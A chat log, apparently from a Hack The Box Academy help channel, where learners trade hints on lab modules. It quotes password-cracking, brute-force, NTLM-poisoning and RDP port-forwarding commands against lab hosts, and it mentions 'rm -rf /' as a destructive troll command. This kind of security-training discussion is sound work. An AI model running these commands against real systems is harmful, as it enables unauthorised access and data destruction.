#modules
I just checked
Idk why I was thinking
Gotta love regex
I had my operators backwards at first though lmfao
so it is in the mut?
Yes
At least the base one if you didn't cut any as has been suggested many times in this chat lol
ok
running 'john --wordlist=mut_password.list bit1.hash'
lets see if it spits something out
got it
but get "Not authorized to perform operation" when trying to access the mount..
how would you do that
Have you honestly never been root on your own system?
Are you missing the sudo on your mount command?
Idk where you're lost then bc you should be able to access it just fine if you follow the steps
Like, is it mounted, and still nothing?
maybe I'm just missing something obvious
Like if you sudo ls -la /wherever/you/mounted
When you mounted it: did you include the password
Huh I followed the steps exactly and had no issues
Did you do the "cryptsetup" command?
Yeah following the link from above here #modules message steps exactly it worked just fine
Dm me a screenshot of your terminal and the commands you did
Hi guys,
I'm stuck on the AD Enumeration & Attacks - Skills Assessment Part I.
I got the hash for the ||svc_sql|| user, and I attempted using hashcat with rockyou.txt wordlist to crack it with no success. 😥
it does crack with rockyou, what's your command?
use rockyou.txt
they did
Also make sure that you haven't got any leading white space etc with your hash.
hashcat -m 13100 <hashFile> /usr/share/wordlist/rockyou.txt
exactly
why for answering the question: Which kernel version is installed on the system? (Format: 1.22.3). Why do i have to use the kernel release to get it right and not the kernel version using uname -v like the question says?
-v, --kernel-version
print the kernel version
Promoted to script kiddie 🥲 is that a promotion or a reprehensible
anyone know what to do in attacking common services medium assessment
there is only dns server
and a useless pop3
Rescan it again, you will be finding a transferring protocol
i did a full tcp scan but found only 4 ports, a dns, a ssh and pop3 and pop3/ssl
ok lemme try again thank you
you can get the service in different port number also, check it
i used nmap -p-
always do a quick scan first so you can start, and then while you're investigating those initial findings you should always run a full scan (unless the goal is to be sneaky).
Revert your IP and give try or try with pwnbox
revert means change the vpn or restart the machine
restart the machine
i tried yesterday and got the same 4 so imma try with pwn box thanks
the minrate is too high also combined with the -T3 i think
you can miss open ports
also disable dns discovery with -n
even on pwn box it is showing only 4
i got some domains from dns but they are not reachable
did u restart the target
oh no
oh wow i see it now thank you so much
would've wasted hours on digging lol
since when did they add this
ive seen since my beginning on the academy 2 months ago
personal vm >>>
python2 💀
read the error, the "address already in use", use a different one
Hey guys, im currently learning cybersec and I've been using Kali Linux for almost a week now. And I like it. So I got my old computer (dual core with 8gb ram) and got a new laptop (8gb ram too, but 6 core 12 threads). I wanted to setup a proper secure lab/environment to learn hacking, networking, scripting and doing ctfs. So how do I set it up? And could I use the old computer I was talking about as a server for VMs? Which distro should I run as my host, on my main laptop for daily driving it and learning linux.
Considering either parrot or something else (dunno about dailying Kali, though I prefer kali over parrot)
oh yeah, it was a whitespace issue 🤦♀️
I'd love to hear your advice guys
Anyone available to assist with a module?
I am working on attacking common services in the Academy and I can not for the sake of me connect to the FTP server I have tried every method in the FTP training.
In which section, which question are you in?
Attacking Common Services Attacking FTP : What username is available for the FTP server?
What ports did you find?
I found the correct ones and tried connecting, I get connection failed. I tried Netcatting also
How did you try to connect?
Show me the command you used
You can DM it to me so we don't spoil here
Hi everyone. May someone help me on File Inclusion - Automated Scanning please? When I run the command provided ||ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://http://94.237.56.76:57958/index.php?FUZZ=value'|| I get no result:
sent over
how can I enter a screenshot here?
you have to verify your account to be able to send screenshots see #welcome
Anyone aware why metasploit isn't returning any info? Just says successful but doesn't give any of the info it's supposed to according to the walkthrough.
Can someone help me here? Not irritating or spamming, pls just don't ignore this
thank you
Are you guys running these in VMs? locally or in cloud
Hi everyone. May someone help me on File Inclusion - Automated Scanning please? When I run the command provided ||ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://http//94.237.56.76:57958/index.php?FUZZ=value'|| I get no result:
Alright cool
nvm, a really silly formatting issue
http://http://
you have syntax error
OMG how dumb, thanks for your help
any time
Well, thanks for verifying at least.
@lusty thicket Are you running parrot?
When using Metasploit to mssql_ping an IP, it works fine on HTB pwnbox but my personal VM doesn't return any info, just says scan successful for some reason. Anyone got any ideas as to why this might be?
do you guys accept people who have never hacked before? i really want to learn
HTB Academy is a great place to start if you're a beginner
thank god
sign up on the website and start doing some modules. if you need help this is the channel to ask questions about those modules
thank you.
kali
Hi @here I am stuck on Attacking Common Services - Easy . I was able to get the username. Trying to brute force mysql with given password file, also used rockyou.txt on smtp and mysql, but in case of mysql it is erroring out like connect block after some time. Can someone please point out what I need to focus on and where I am getting things wrong 🙂 . Thank you
Hello, i've just started the "Starting point" course and i'm currently stuck on "Responder" module, the said Responder does not capture any hashes. I used the command and url (replaced with my IPs) provided in the walkthrough. I'm connected via openvpn since there was an active service on port 80 with pwnbox. I don't have any errors, just no hashes. Does anyone have an idea ?
if there is a provided password list, use it. || there are other ports you can brute force besides SMTP and MySQL ||
Hey @mossy hatch should I use default password list or rockyou ?
go to #starting-point
my bad
Hello everyone!
I need help with "Nginx Reverse Proxy & AJP" from server-side attack module. That problem (nginx: [emerg] "upstream" directive is not allowed here in /etc/nginx/conf/nginx.conf:10) is occurring after adding required code to config file. I searched on google and found a solution that i have to add "include /etc/nginx/conf*" line to /etc/nginx/conf file but that didn't help me. I tried both my machine and pwn box, in both situations I have the same problem
Hey there everyone, greets!
I've been trying to learn by fooling around with msfconsole poking on my target machine via the pwnbox.
I should be working on finding public vulnerabilities, namely for the WP Simple backUp plugin and work my way into getting the flag.
While having been stuck for some time, I thought I'd try smth different.
So:
- I ran through the msf search on Wordpress and found the WP bruteforce/user enum exploit.
- I managed to find out the username and id# on the wp-login and from that point on
- I'm throwing whatever wordlist makes sense on the set pass-file option.
QUESTION: It should work yes?
Never mind, I randomly found answer😅
I think it should be CVE
Sounds like you have to find it using msf right?
for the flag, yes it should be.
The question is if I'll be able to bruteforce the wp-admin login
You don't have to use msf to brute force, wpscan better option i assume you know that tool?!
Now I know of, I'll take some time checking this too! thnx 🙂
Hi guys, I'm a little bit lost when it's the finding bad characters on Windows Buffer overflow
I'm using the python script used in the course but my results are really different than the course
I really do not understand the py script is the same as the course
Guys I am following wireshark and sql injection course from udemy will these two enough to try ctf in HTB?
also checkout #homelab-sysadm for help with homelabs etc.
had that happen so many times.
Well you can try boxes at htb with any level of knowledge, but just sql injection won’t get you too far and having to use wireshark is probably even more rare. There are quite a few techniques you may need to know for htb boxes
Hello everyone,
Hope you're good. Need your help regarding : Active Directory Enumeration & Attacks
Session : LLMNR/NBT-NS Poisoning - from Linux
Question : Crack the hash for the previous account and submit the cleartext password as your answer.
So, I ran "||sudo responder -I ens224||" and got many NTLMv2 hashes.
I got users : ||cluster / Backupagent / wley / forend / svc_qualys / lab_adm.||
Problem : I cracked ||wley / forend and svc_qualys||
Regarding the question, I think I have to crack one remaining hash previously mentioned : ||lab_adm||
But with the following hashcat command, it seems not possible to crack it : hashcat -m 5600 hash /usr/share/wordlist/rockyou.txt
What do I have to do ?
Thanks for reading
I don't think you're asked to crack lab_adm's hash anywhere
uhmm, hey guys?
in general, not every hash you obtain can be cracked
anyone?
Sadly I tried to crack other hashes but none could be cracked
oh alright, thanks
didnt see your message
still stuck on it :/
like I said, not every hash will crack
they're not all using weak passwords
and the module doesn't ask you to crack it either
are you using proxychains?
if so you haven't actually prefixed your xfreerdp command with it
so there will be no route to the host you're trying to connect to
@naive wadi I dont have access to that channel though
read and follow #welcome
you need to link your htb account
see @hallow kiln response
what specific part are you on? If you let me know I can check my notes. Also there is a beautiful irony that you have proxy in your name and you're having issues proxying
cool let me check
but what section of that module? There's a bunch of sections?
@mossy hatch
k
are you sure .19 is who you're supposed to try and connect to? Have you double checked all of your addresses are correct?
so your jump host/pivot-host is 251 and your target that you're trying to rdp to is .19?
what's the output when you do ipconfig on the pivot host?
okay so xfreerdp /v:10.129.79.251:8080 /u:victor /p:pass@123
proxychains?
nah, it's not a proxychains one
i'm not caught up on this.. can you actually reach the host you're connecting to
it's the netsh
oh yeah, it's probably that, the initial command posted doesn't have the correct IP
he basically is trying to connect to a 172. host when he has actually forwarded a port to his 10. pivot host which is listening on 8080/9001
remember you're forwarding port 3389 traffic to port 8080 or 9001, can't remember what you had setup
follow what ScaredGrandpa said
yeah but the point is you have mapped 9001 to 3389
so you need to xfreerdp /v:10.129.79.251:9001 /u:victor /p:pass@123
okay
your IP is wrong
well either way that's the issue
then same command with 8080
can anyone help me with this question in splunk?
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the count of distinct computers accessed by the account name SYSTEM. Enter it as your answer.
cant find the correct syntax even with the Hint
this says the IP is 172.16.5.150 (this is what you're trying to reach), but your netsh.exe command is forwarding to 172.16.5.19
okay i need you to start from the beginning... you need to send ONE message, and show the results of xfreerdp, ipconfig from the compromised host, and the output from netsh.exe interface portproxy show v4tov4
i'm not going to keep scrolling up and down through wrong/misplaced photos and getting confused
one message with all the proper screenshots
Hello,
can somebody give me hints regarding NoSQL injection module with Skill Assesment 2 pls ?
Hello I need help on getting started on hackthebox
In Common Services / FTP - Medusa is mentioned for bruteforce. In previous sections it has been Hydra. any benchmarking on these?
this is only for HTB Academy - if you need help with a module you'll need to specify what module/section you are on.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
idk if its improved but I hated medusa 10 years ago and Ive developed an aversion ever since my shitty 50 line ftp bruteforce python script I wrote in an evening did a better job with less false negatives.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I guess your try for 2nd question. that is POST login page
idk why it sent that again...
Your syntax has a few errors, like give correct login.php, and looking at view page-source will help you!
I recommend you reread the material - https://academy.hackthebox.com/module/57/section/489 - Web form Brute Forcing
you won't be able to reach 172.16.5.19 so that last screenshot is supposed to error.. your first command isn't specifying the port
/v:10.129.51.233:8080
or do /port:8080
RDP by default is using 3389, but you want to connect to port 8080 so it forwards and follow what you setup with netsh.exe
i know the module teaches 8080, but i'd avoid common port numbers in the future
is the user actually, 'user'?? secondly, i don't believe i ever used :FAIL when doing that module
i'd have to redo the lab to verify if you still need help
let me redo the skill assessment, you said it's the Skill Assessment - Website?
are there problems with box on Common Services > FTP. Been trying to bruteforce for a while now, should take this long for such a simple task
hydra -L users.list -P pws.list ftp://10.129.123.220 -s 2121
user list and pws from resources
been going for 20 min +
Attacking Common Services > FTP
http-post-form "/login.php:[user]=^USER^&[pass]=^PASS^:FAIL=log-in:SUCCESS=Login:F=<form name='log-in'
- Give - correct login.php
- Give - correct user and pass format
- Look page source - for the Fail string
Refer : https://academy.hackthebox.com/module/57/section/489
right but you set up a listener to
listen on 10.129.51.233:8080 and forward to 172.16.5.19:3389. you cannot connect directly to 172.16.5.19, you're on different networks so why try. BUT you did setup a listener that you're not using
|| xfreerdp /v:10.129.51.233 /port:8080 /u:<user> /p:'<password>' ||
your problem is you were trying to connect to something you can't reach in the first place.. you setup a listener and weren't using it
haha i was just about to get back to you sorry
was jumping around the place helping others
do you understand why @rustic sage ?
don't use :FAIL and :SUCCESS, i don't believe the module even explained this?
the main format is "<login-page>:<request body>:<error message>"
and as you've probably learned, it doesn't actually have to be an error message, it can be anything on the login page (like HTML code) that won't be on the dashboard of an authenticated user. an authenticated user wouldn't see <form name='login' because they're already authenticated. this is how hydra will determine if it's successful or not
got it, only 3 respawns 🙂
no problem. feel free to reach out if you need some more help 😉
what OS are you using?
there should be one pinned on kali (and i believe parrotos too)... if not open the applications folders and search for it
There's many ways to find it depending on your os
I can't even do introduction, damn feels bad. It's linux
Yes but there's the pwnbox (htb's in-browser vm), parrotOS, Kali
yes
lol send a screenshot of your screen
They can't
I'm supposed to locate the bash terminal icon and click it and then type "uname -a" to find out the flavor of something
OK. Look at your screen, identify the screen. Turn your computer off and give up. (Joking)
ha ha, yesterday I did exactly that (not a joke)
You still didn't answer
I didn't understand the question
what's a vm?
virtual machine
Hosted through virtualbox or vmware usually
If you aren't using one of those you are probably using pwnbox
I dont mean this in a mean way. but you may not be ready for the infosec fundamentals yet
Id look into setting up your own VM and look up resources on basic Linux knowledge
Not to sound mean: but how old are you?
and come back to htb academy when youve got a little more computer exp under your belt
Thats why I suggest coming back when youre a little more comfortable with basics
how can I get comfortable with basics? where do I learn?
Like, give it a month of practicing and learning basic Linux and VM operations
over the wire bandit was how i learned to work with linux
yt?
The best way to gain linux experience is by setting up your own vm and just using it for a bit and also using a guide like linux basics for hackers is a good book
Or youtube videos for free
Linux for Dummies
definitely what I need
God I love the {topic} for dummies books
why is this so hard
You gotta start at the basics and work your way up
Youre picking arguably the hardest field in all of computing
next to computer engineering at least
Im speaking about the heights of the field
If you keep saying it's hard then you're gonna constantly gaslight yourself into giving up
the journey from beginner to master is such a massively longer road than people give credit for
I thought that HTB was for beginners at least it asked me if I was a beginner and I did not lie about that
Ye I figured
HTB is more for intermediate users
HTB is kinda notorious for having...higher expectations about what a beginner entails
beginner in cybersec is like already a novice sysadmin/programmer
Try hack me is an easier one to get started with
fun...
But I would still recommend learning linux before going to try hack me
Yup
Okay
just google how to setup a VM. and research different "distros" and try installing them and learning how to use em
try several different distros even
Yup
Just because certain distros are 'common' for hacking doesn't necessarily mean you have to use it
They usually just have more preinstalled tools
yea
You can get by just fine, for instance, with Ubuntu
more of a different flavor
^
Linux is the kernel
Linux is the kernel
OH
Jinx f0x
thats why I say distro isnt quite the same as version
cause you can have diff kernel versions within the same distro lol
Learned this the hard way after signing up for oscp after a few low level certs
how does a flavor look like?
It depends
They can be radically different
You can have two distros be nearly identical and two distros that feel like utterly different OSes entirely
thats why I recommend installing and playing with several different distros
okay that actually made me get the question of introduction right
which is a flavor of debian
Well yes. But did you do it from the terminal?
So you did find the terminal
Clicking things randomly isn't bad
get used to doing that a lot
Okay
i am confused
a little trick to remember when things get confusing though is: while some linux filesystem stuff is super duper important and critical, theres other sections just because different groups of people disagreed on the best way to do it so you get a mix of em
^
oh okay
/root/ is equivalent to c:\users\Administrator
Oh that's what I saw in the bottom of the command page after I typed the uname -a command
without the last /
Also wait until you find out in linux that everything is a file
👉
everything
tough
well apart from processes, but they can come to that abstraction when they need to
files too
/proc/self 🙂
Yep
I didn't want to melt their brain but since you've brought proc into this
is it normal to try and use the firefox inside the thingy and not working?
Which is why the most common troll, and I cannot stress enough the importance of not running this command, is rm -rf /
@fathom pendant speaks the truth do not run that
The pwnbox is limited on internet access
anything I need to do?
What section are you on?
we heard you like filesystems, so we made everything a file and put a virtual filesystem in your filesystem
Interactive section with target
As far as I know there’s security in place for that command now
Maybe on the pwnbox
And you're doing http://ip:port?
yup
is it worth it to redo two sections I have already completed in order to refresh understanding of a more advanced section? I'm doing Intro to Nmap module and I'm on last section and I have some stress over other stuff unrelated to HTB or hacking and I had a hard time figuring out the last section and I'm still having a hard time and now I think I need to refresh myself on previous two or three sections. I read the fourth to last section again and now I'm thinking of redoing the easy and medium labs. Is that a waste of time? I'm sure I can do it in a few days if I need to. Its been a week or two since I touched Academy.
Yeah use your own browser, unless you buy some cubes or subscribe, the pwnbox is hyper limited on internet access
f
Yup doesnt hurt to do review and update notes
Sometimes Ive gone back to an old section and Im abhorred about how bad my notes were and I take a solid five to ten minutes updating them
How do I find the password for the user mary with wevtutil
But yeah I suggest setting up your own vm, as free is limited to one spawn per day
use wevtutil to find the password, make sure youre looking for mary
Lol
my brain can't process this VM thing atm
Following the steps from the section is a good start
Thats why I said take a month off from htb to learn VMs
in windows privilege escalation Module
I believe there’s even a module for setting everything up
I had to spend so much time updating notes as my ability to take notes has gotten better the further I go through the course
There's really not a whole lot that's complicated (unless you want it to be)
yea apparently to have a VM takes only 5 steps
i have already followed but i am not able to get the PWD for mary, can anyOne help me OUT !!
6 if u count with the shutdown
yup exactly
yeah, you can get a VM up and running really quickly
I really want to spend a weekend just sitting down and totally overhauling my notes
Download VMware/virtualbox, download kali iso, create vm in either of the hypervisors, install kali
migrated to org-roam so cross linking all my notes too as I go
it's been really useful
Im doing little tweaks here and there but itd be better if I just sat down and did it all in one go. Start leveraging more advanced obsidian features too.
Step 1) identify which software you wanna use
Step 2) download the version of Linux you want
Step 3) follow installation instructions (usually give more resources than recommended minimum)
Step 4) wait
I had covid recently and actually did that.
But my weekends are booked till like mid November
Just get someone to cough into your open mouth and you can do what I did
I like the step 4
I already had to take some work off for health stuff recently so I cant afford to miss too much more atm
From what I found on google :
Step 1: Prepare your computer for Virtualization. ...
Step 2: Install Hypervisor (Virtualization Tool) ...
Step 3: Import a Virtual Machine. ...
Step 4: Start the Virtual Machine. ...
Step 5: Using the Virtual Machine. ...
fair
and 6 shut it down
i dunno where to ask this, but how can i contact academy CS, i can't get it to appear on the support chat bubble
Can anyOne plZz help me out Broh !
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} from this I am not able to fetch the password for Mary !!!
@acoustic flame my profile specifically says to ask before DMing, and its also against the server rules to send unsolicited DMs
You using a pop-up blocker?
This, it does not play nice with a popup blocker
no, i see the chatbox but no idea where to actually contact CS
Messages
type some bs
robot will give a useless answer
then hit chat with agent
when I run arp -a in my lan which im connected via wifi no other devices were found
Anybody to help with NoSQL skills assessment 2 pls ?
what's your question?
Yeah so I run arp -a in cli but the devices are not displaying in terminal, only my ip and gateway show there, but when I go to the router it shows the devices and the firewalls are off
I have injection point ... I have payload because I thinks it is SSJI it is blind injection ... not sure if I need to find correct object parameter name because it looks like that e.g password is not password but smt. like pass ... I want to extract token through JS but not sure if it is good way ...
You're provided with lists in the module
Anyone able to assist with 3rd question from skill assessment on WIndows event logs?
By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe
Can anyone give a hand with DACL Attacks I "Password Abuse"? On the last question, tried a couple variations, but unable to read or download flag.
SQLMAP ESSENTIALS
skill assessment
What's the contents of table final_flag?
I have looked in every single place on the web application and I've even used ffuf to fuzz for directories and files using raft_large_files/directories. Can anyone please nudge me or hint me or save me please
How do I do this, new to hacking
Did you make an account
For what
For Neopets
I found this on my discord server search tab
If you want to learn how to hack. Use HTB Academy. It's a school for hacking.
http://academy.hackthebox.com
Do I have to have a computer
You can probably do it using Kali Nethunter on mobile but that is going to take a lot of effort
So yes you need a pc or laptop
Shit
You should it's really fun
well you didn’t look EVERYWHERE
best advice is || launch Burp and listen and you’ll see what you missed ||
I used Burp for each directory and file that I found. The only thing I find are API related to google maps for when you are checking out. Can you please give me any nudge towards the vector Please?
you can dm me
I'm so confused
What has confused u
then this isnt the server for you
this channel is for discussing academy modules only and the server is for the HTB community at large. If you dont know what that is then its not a place that would appeal to you.
I joined because the description was learning
Well I don't see a general chat now do I 🤷♂️
Yeah because you haven't read #welcome
the server is locked off to people that haven't verified their account
Dont have an account for it
No shit
Thats why I said this server was likely not for you 😂
Either you make an account or theres nothing for you here
Be like me joining a basketball discord when I dont play basketball
Obviously
try clearing cache, logging out, and then back in?
Been having box stability issues myself on the us vpn, haven't tested the EU ones to double check if it's just me
Shouldn't be
i want to bruteforce using dnsenum but i cant because the box keeps randomly falling over
Try changing vpn region, resetting pwnbox, and resetting target
i'll try changing region
Well when you change regions you'll have to reset target
hello! i found ||ticket in Ccache shared folder|| in crackmapexec module in last question skills assessment. it is malformed and i cant use it. is it a rabbit hole and i need to change the focus?
Did you try using it. Or are you just asking before doing
Yeah it happens (probably more than it should)
I tried. your answer helped me understand that I was doing something wrong, probably accidentally adding a byte to the ticket. rebooting the machine and reusing the ticket, as well as more careful work with the ticket (Kerberos and Impacket) = everything worked out.
maybe it’s because I’ve been studying this module for 7 hours and I’m tired). thank you
No problem, there's a handful of people that hit a wall and literally don't try anything
having trouble on Intro to Metasploit, question is to use EternalRomance. But every time i run the exploit it says "exploit successful but no session created"
Did you set the right LHOST?
the LHOST is just some random IP and its listening on port 4444, I never specified that IP or port before tho
I am using the instance of parrot provided by HTB, not using my own machine. if that is significant in any way
Well if you're not on an attack host: LHOST will be the tun0 ip
L Stands for Listening
If it's not an ip/interface on your system it won't call back to you
It will call (unsuccessfully) to that random ip
thank you, used ifconfig and set the correct IP for LHOST, got a shell now
Fun fact in msfconsole you can do lhost=tun0 and it'll grab that interface's ip
Or whatever the command is my msf stuff is rusty lol
ahhhh okay, thats handy. thank you
Mhm
Can anyone help me with Authentication Bypass - Type Juggling in Whitebox Attacks module? This section seems relatively straight forward, just use a || magic hash || but I can't seem to get it to work.
guys any videos or write ups that i can watch or read to just know about active directory hacking like to understand the concept of the course from a to z before going into the skills assessment
any suggestions
Anyone available to compare flags for the first question on NTLM Replay Attacks - NTLMRelayx Use Cases? I have the flag from the connections.txt file, but it's not accepting the flag as the right answer.
Both of the flags. I got them from the files you supposed to, but the system will not accept the flags.
hey im doing the same lab (and thank you for the help) but im curious as which exploit do you choose?
i did search eternalblue and like 4 different options came, which one do you choose now?
(i searched for eternalblue instead of eternalromance but how'd ik to search for ms17_010 instead then 🥲 )
anyone
Have you already done the module Introduction to Active Directory already?
Yes i did that
And im close to end attacking with enumeration
And i need to practice those techniques
Cuz too many things i need to see what i can do first what second if this didn't work lets try another thing i didnt want just to study like i have. Lot of information need to put them under practice read or watch something to be more familiar with it
Maybe this one?
https://app.hackthebox.com/tracks/Active-Directory-101
Do i need more skills without the windows privileges escalation and the Active Directory?
No idea what skills you need.
At the exam you need all skills from all 28 modules and from the 12 modules which are considered as basic requirements for the path.
Thank you mate
If i use a proxy can my ip be leaked because of the WebRTC thing
That's not related to an academy module
it is
Which one?
networking i guess
"I guess"
If traffic is routed through a proxy: your ip is still masked
ok so i dont have to worry about webrtc
¯_(ツ)_/¯
im talking about firefox proxy
Again not really related to any module it doesn't sound like
This sounds more like a question for #web
Like if you're that schizo about it, don't use webrtc
Brother, no one cares enough about you to steal your ip
Your IP will certainly be known at HTB through the VPN.
morning, notice the windows target for lab https://academy.hackthebox.com/module/158/section/1436 DNSCAT asked me if it can restart to upload updates now, maybe configuration err and updates should be disabled ? anyway notice target was bit slow.
Htb when they get @valid cipher s ip
Or just copy/paste I didn't see their other messages and still don't lol
Yeah got deleted
So if bot, automod whacked
Whenever it connects to a website, or via VPN.
Go read Michael Bazzell's book if you want to try and be anonymous. It's probably the most comprehensive on the subject. Also The Hated One on YouTube.
Can anyone plz help me with student subscription? I signed up with my unis email but obviously not on a list. Who do I message to get it listed
@everyone
Message website support
They'll look into your email and basically chuck it on a list
Where do I find it?
Need to speak to a person? Learn how to reach our support via the Main Platform.
Should be a green bubble at the bottom right of the screen on any academy page
but theres no option to message them for me at all
Select arbitrary article, react with sad face
I did still nothing
Try reaching out to customer support email then
It's towards the bottom of the article I linked
You can also try clearing cache and logging back in
I'm not an htb staff member, nor did I give consent to dm
There's an email in the article I linked
Hey I am stuck at Footprinting on the question: What is the customized version of the POP3 server? What do they mean with customized version? I have already answered the other questions but I am not really grasping what they mean with customized version.
So if you connected to the pop3 server, what is the version it gives you
That's basically what it asks you
"Customized version" is another way of saying "not default"
ugh had to copy all the text not just version
Yes
I don't consider the fact that they changed some words in that banner to be part of the version
It could've also been "Peter POP3 V123"
"Some words in the banner" who's to say they didn't actually manipulate the base software code for dovecot, to be implemented for the business (hypothetically)
Go eat a snickers, you're not you when you're hungry
I am hungry atm lol

i ran this command nmap youtube.com -Pn --reason --top-ports=12 and got port 80 to be filtered, i ran this command nmap youtube.com -Pn --reason -p 80 and i got port 80 to be open.
w h y? ._.
(doing nmap module btw)
https://nmap.org/book/legal-issues.html
if you don't want your ISP or the popo come knocking then i suggest you stop scanning random domain that you do not have permission to scan
One message removed from a suspended account.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
waits for the request to be illegal
if it's academy related then ask here
Called it
read the #rules because you ask something dumb
Cue "how do hack tiktok or iPhone?"
or youtube
no
She lives in Canada but she's real
Is it emma?
Wait, you know Emma from Canada?
@fading violet
Time + study = hacklord
Not really
I mean that's kinda what academy is... help to learn hacking
And thm
You can have both?
Like curiosity leads to asking questions
Not understanding answers tends to lead to wanting more help than just study on your own
¯_(ツ)_/¯
Good morning everyone
hey guys i need help. anyone finished the password attack easy lab i dont know which password list to use i used the one in the password list in the given resources and the mutated version but no luck
pls help ❤️
You just need a little patience.
The list used is already correct
thanks bunny
Read #welcome
but is it correct that this list has p:94044 and could take up to 3-5 hours ?

Hi! Im struggling with the Type Filters in the file upload attacks. Anyone can help me?
Im fuzzing the file extensions to avoid the whitelisting but everything upload properly but nothing works and executes
The password though is definitely in the base passwords.list, alongside the username in username.list
attacking ftp is faster
😉
Yes
do you know what the client side is blocking/accepting?
but it says in the question to get the root password so i suppose i only use root for the username
Yes, I got my files uploaded but I can't execute them
yeh doing both at the same time ftp is always way faster ^^
That's the end goal
You must first figure out a base to start from
Examine the first target and submit the root password as the answer.
ah okay
It wouldn't be a skill assessment if it was just one step
dm 🙂
true
well lets see currently running now the right brute force
And start at ftp
No but, ssh is gonna be fruitless
If you just try ssh root@ip youll see why
You can use more threads for hydra btw
48 is recommended
64 can cause false negatives/positives
yeh going for the recommended dont wanna crash the machine or get negatives and do it all over again
Eh you won't crash the box
Is anyone available to help me with the Service Authentication part of the Brute Forcing module - none of the wordlists I am using seem to be working.
May I DM you?
still need help with this?
okay im in the machine used the ssh key i found now im trying to get the passwd and the shadow file to crack them but shadow file is protected cant copy read or transfer it am i missing something fam?
try privilege escalation to see if you can access shadow file
yeh thought about it but its not part of the module thats why i dont think its the way to go also ingoing connections are restricted cant transfer anything in it just out
omg
found it
keep looking around guys
Hi I am in the footprinting module snmp section I am stuck on the last question
Enumerate the custom script that is running on the system and submit its output as the answer.
I have found which script they were talking about
cat snmp_oid.txt | grep "flag"
iso.3.6.1.2.1.25.1.7.1.2.1.2.4.70.76.65.71 = STRING: "/usr/share/flag.sh"
but I do not get what I should do from here I tried feeding this to braa but got no result
┌─[eu-academy-2]─[10.10.15.210]─[htb-ac-399878@htb-smcw0q8zqo]─[~]
└──╼ [★]$ braa /usr/share/flag.sh@10.129.155.200:161:.3.6.1.2.1.25.1.7.1.2.1.2.4.70.76.65.71
┌─[eu-academy-2]─[10.10.15.210]─[htb-ac-399878@htb-smcw0q8zqo]─[~]
└──╼ [★]$
Can someone nudge me in the right direction?
iirc the answer is supposed to be a flag
Yup
You don’t need the script, you need the output
maybe try waiting a little bit in the ||snmpwalk|| output
😉
yes I know but I do not get what to do with the oid
do you really need it
😉😉
I was hoping to run the script but I dont know how
./script.sh

Am I wrong 😆
||snmpwalk|| recursively queries oids
found it
you’re absolutely right ✅
Good
You’re welcome
Ah I see you found the answer
yeh wasnt looking too much around before i tried unshadowing passwd and shadow
now its time for the medium
scan shows port 22,139,445
ez

Medium is arguably a bit rougher
But these skill assessments also play on your reading comprehension a bit too
I found the assessments pretty straight-forward, just the module as a whole tedious
yeh but my approach in the module is just password attacks because seeing this "22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
88/udp open|filtered kerberos-sec
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
389/udp open|filtered ldap
500/udp open|filtered isakmp
520/udp open|filtered route
2049/udp open|filtered nfs
" could lead to lose a lot of time testing other services for me is only ssh interesting at the time right?
Is it though?
idk yet currently found the user dennis and jason might try brute force my way into them
having SSH access is great, but you basically look through everything else before touching SSH
Good start
If you need a nudge on what service to crack; read the target synopsis to narrow down your options
well now that you say im seeing kerberos could be interesting
Wrong
nothing in the module talks about Kerberos
but i need a foothold in the server thats why im going for ssh
lol it does 🙂
Why is your first instinct ssh?
I see another very juicy port to hit with the hammer
it is because its the only service that we learned in remote password attacks
my bad, you're right, but everything else being on UDP, you're only interested in the three initial ports you got
Perhaps, but did you need to brute ssh at all?
You were given alternative ports to hit every time
Samba smbd 4.6.2
considering the users you found, I assume you're further down the assessment, or do you not have their passwords?
Hint: this user is smart and doesn't reuse passwords for different services.
thank you very much guys
I didn't use crackmapexec either, but it can be used for sure
Mostly bc I don't think hydra has an smb module
😉
Because he's literally just digging at arguably the roughest brick wall without thinking: "surely there's an easier way"
And even then I don't think the ssh password is in the password lists
So spending who knows how long
Can relate to that
Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. stuck here for long time need some hint/help
can't get the shell
have you tried using what you learnt in that section
which usually means "hey follow these instructions and maybe change like one or two things to get it to work" ¯_(ツ)_/¯
ez
lul got the password now its time to dig my boys
hello everyone i am new in htb academy
can anyone tell me that how we can see the answers of questions in the modules
to which we have access
awesome
you can’t


but as i am new i don't know how they want the answers
any idea
or module in which they have introduced these things
can u tell me in which module i can see that
you can start with the information security fundamentals module
but i have bought student subscription
Dont you guys think if he is really a beginner he needs to start with thm to get some basics
i am not beginner brother
you can say that 🙂
as i am new in here
thanks boss this was really helpful 🙂
Im stuck on the Active Directory BloodHound module. I need to find the rights that sarah has over nicole. So far I believe I have found them but it says they are not correct. Is there anybody who has done this module who can help?
I can DM about other things I have tried so far.
set your event code to filter out more stuff
Is there any hint about next module
@acoustic owl can I dm you regarding the HTTP Attacks module?
sure
Two modules should therefore still come
If you still need help, you can send me a DM.
hello am new here
question about how learning modules are structured - are they intended to build on each other one after the other or are they intended to be self-contained?
There are modules that build on the knowledge of other modules. But there are also modules that are self-contained.
many thanks!
Most modules will at least build off the fundamentals (obviously)
I just finished the CBBH path, is Modern Web Exploitation Techniques a good module to unlock for further deepening my knowledge?
Go for Whitebox Attacks first I would say
I mean I'd assume so, but if you're planning to take the exam I'd try and avoid the more advanced modules for now. As you can overprepare yourself - and overthink simple things.
Not really thinking about the exam rn, as I don´t need it for job roles
Just doing the academy for knowledge for now
That's fair lol and (unless they add content) you'll be fine to come back to it whenever and do it
